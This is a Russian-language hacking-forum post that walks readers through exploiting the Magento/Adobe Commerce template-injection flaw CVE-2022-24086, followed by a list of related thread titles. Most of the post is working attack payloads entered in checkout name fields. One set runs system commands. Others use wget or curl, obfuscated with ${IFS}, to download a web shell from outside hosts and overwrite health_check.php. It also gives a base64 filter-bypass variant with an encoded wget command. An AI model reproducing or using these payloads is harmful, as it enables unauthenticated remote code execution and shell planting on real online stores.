Статья Эксплуатация уязвимости Remote Code Execution в Magento (CVE-2022-24086)

devqp

Специалист
Уязвимость CVE-2022-24086 затрагивает Adobe Commerce версий 2.4.3-p1 и ранее, а также 2.3.7-p2 и ранее. Она позволяет выполнить произвольный код без аутентификации пользователя через недостаточную валидацию входных данных на этапе оформления заказа. Эксплуатация возможна только на сайтах, использующих стандартные email-шаблоны.

Шаги эксплуатации:
1. Создайте учетную запись на целевом сайте, добавьте товар в корзину и перейдите на страницу оформления заказа.
2. Для проверки уязвимости введите в поле "Имя" payload:
Код:
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(pwd)}}
Если в подтверждении заказа отображается путь к файлам — уязвимость присутствует.

Загрузка шелла:
Используйте один из методов:
• Замена health_check.php через wget:
Код:
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(wget${IFS%??}-O${IFS%??}health_check.php${IFS%??}mydomain.com/shell.php)}}
• Альтернатива с curl:
Код:
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}myshell.com/shell.txt)}}

Обход фильтров через base64:
• В поле "Имя":
Код:
{{if this.getTemplateFilter().filter(dummy)}}fname{{/if}}
• В поле "Фамилия" (где encoded-base64 — payload в base64):
Код:
{{if this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).Filter(encoded-base64)}}m{{/if}}

Важно:
• PHP выполняется только в директории /pub. Если путь из pwd оканчивается на /pub, используйте относительные пути, иначе — абсолютные с добавлением /pub.
• Пример base64-пакета для wget:
Код:
d2dldCAtTyAvaG9tZS9jb2lsL3B1YmxpY19odG1sL3B1Yi9oZWFsdGhfY2hlY2sucGhwIGhhaGEuY29tL2hhaGEucGhw

Уязвимость CVE-2022-24087 также активно эксплуатируется в дикой природе.
 
Похожие темы
Admin Интересно Эксплуатация уязвимости в Ghost CMS привела к взлому более 700 сайтов. Новости в сети 0
G SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (часть 1) Полезные статьи 0
I Брут-форс и эксплуатация скомпрометированных WordPress Уязвимости и взлом 0
Admin UFOLABSNEWS CISA подтвердила атаки через уязвимости в JoomShaper и Langflow. Новости в сети 0
devqp Статья Критические уязвимости аутентификации в OCPP 1.6J: угрозы для инфраструктуры электромобилей Уязвимости и взлом 0
devqp Статья Уязвимости SIM-карт: четыре метода взлома и их последствия Уязвимости и взлом 0
devqp Статья Уязвимости генерации Unpredictable Number в EMV и методы извлечения ARQC Уязвимости и взлом 0
Admin UFOLABSNEWS Adobe выпустила критическое обновление для ColdFusion, устранив опасные уязвимости. Новости в сети 0
Admin UFOLABSNEWS Китайские хакеры атакуют университеты через уязвимости в почтовых серверах. Новости в сети 0
Admin UFOLABSNEWS Microsoft выпустила патч для уязвимости RoguePlanet в Defender. Новости в сети 0
Admin UFOLABSNEWS Хакеры используют уязвимости Roundcube для шпионажа за учёными. Новости в сети 0
Admin UFOLABSNEWS Один сосед с дроном может обесть десятки домов. История уязвимости в инверторах Hoymiles. Новости в сети 0
Admin UFOLABSNEWS CISA добавила четыре активно эксплуатируемые уязвимости Adobe, Joomla и Langflow в каталог KEV. Новости в сети 0
Admin UFOLABSNEWS Обнаружены уязвимости в файловой системе FatFs, используемой в миллионах устройств. Новости в сети 0
Admin UFOLABSNEWS Cisco подтвердила эксплуатацию уязвимости в Unified Communications Manager. Новости в сети 0
Admin UFOLABSNEWS Обзор недели: уязвимости в ядре Linux, новые угрозы с ИИ и вредоносные расширения. Новости в сети 0
Admin UFOLABSNEWS Опубликован PoC для критической уязвимости в библиотеке libssh2. Новости в сети 0
Admin UFOLABSNEWS Уязвимости Cordyceps в CI/CD угрожают более чем 300 репозиториям GitHub. Новости в сети 0
Admin UFOLABSNEWS Исследователи обнаружили уязвимости DifyTap в платформе Dify, которые могут раскрыть AI-чаты между пользователями. Новости в сети 0
Admin UFOLABSNEWS Уязвимости устаревшей инфраструктуры угрожают безопасности ИИ-агентов. Новости в сети 0
Admin Интересно Cisco выпустила обновления для активно эксплуатируемой уязвимости в SD-WAN Manager. Новости в сети 0
Admin Интересно Palo Alto Networks предупреждает об активной эксплуатации уязвимости в PAN-OS. Новости в сети 0
Admin Интересно Исследователи обнаружили уязвимости в ИИ-агенте OpenClaw. Новости в сети 0
Admin Интересно Китайский ботнет JDY активно использует новые уязвимости для атак на США. Новости в сети 0
Admin Интересно CISA добавила уязвимости Cisco, Chrome и Arista в каталог KEV из-за активной эксплуатации. Новости в сети 0
Admin Интересно Microsoft отказалась от преследования исследователей за уязвимости. Новости в сети 0
Admin Интересно Trend Micro устранила критические уязвимости в своих продуктах. Новости в сети 0
Admin Интересно Обход ASLR, удалённое выполнение кода и 30 дней тишины. Что известно о новой уязвимости в nginx и почему детали пока засекречены. Новости в сети 0
Admin Интересно CISA добавила уязвимости Langflow и Trend Micro Apex One в каталог KEV. Новости в сети 0
Admin Интересно Imperva обнаружила критические уязвимости в популярной ИИ-платформе Dify. Новости в сети 0
Admin Интересно Microsoft выпустила исправление для уязвимости YellowKey в BitLocker. Новости в сети 0
Admin Интересно Выпущен PoC для уязвимости DirtyDecrypt в ядре Linux. Новости в сети 0
Admin Интересно Microsoft меняет логику работы браузера Edge из-за уязвимости в менеджере паролей. Новости в сети 0
Admin Интересно Обнаружены четыре уязвимости в OpenClaw, позволяющие красть данные и повышать привилегии. Новости в сети 0
Admin Интересно В стандартных функциях PHP для JPEG обнаружены уязвимости, связанные с раскрытием данных и переполнением буфера. Новости в сети 0
Admin Интересно Миллионы роутеров ipTIME подвержены критической уязвимости. Новости в сети 0
Admin Интересно Китайские хакеры атаковали азербайджанскую энергетическую компанию через уязвимости Microsoft Exchange. Новости в сети 0
Admin Интересно Обнаружены уязвимости в камерах китайского производителя, затрагивающие миллионы устройств. Новости в сети 0
Admin Интересно Хакер обнаружил уязвимости в 11 тысячах роботов Yarbo по всему миру. Новости в сети 0
Admin Интересно Google сообщает о первой кибератаке с использованием ИИ для разработки уязвимости. Новости в сети 0
Admin Интересно Хакеры впервые использовали ИИ для разработки уязвимости, обходящей двухфакторную аутентификацию. Новости в сети 0
Admin Интересно Платформа TrustedVolumes потеряла $6,7 млн из-за уязвимости в смарт-контракте. Новости в сети 0
Admin Интересно Palo Alto Networks готовит исправления для критической уязвимости в PAN-OS. Новости в сети 0
Admin Интересно Anthropic выпустила частичное исправление для уязвимости в расширении Claude Chrome. Новости в сети 0
Admin Интересно Обнаружены критические уязвимости в библиотеке vm2 для Node.js. Новости в сети 0
Admin Интересно Новый ботнет xlabs_v1 использует уязвимости ADB для захвата IoT-устройств. Новости в сети 0
Admin Интересно Progress устранила критические уязвимости в MOVEit Automation. Новости в сети 0
Admin Интересно В системе IntraService обнаружены уязвимости, упрощающие фишинговые атаки. Новости в сети 0
Admin Интересно Три уязвимости в Microsoft Defender активно эксплуатируются злоумышленниками. Новости в сети 0
Admin Интересно Adobe выпустила экстренные обновления для уязвимости Acrobat Reader. Новости в сети 0

Название темы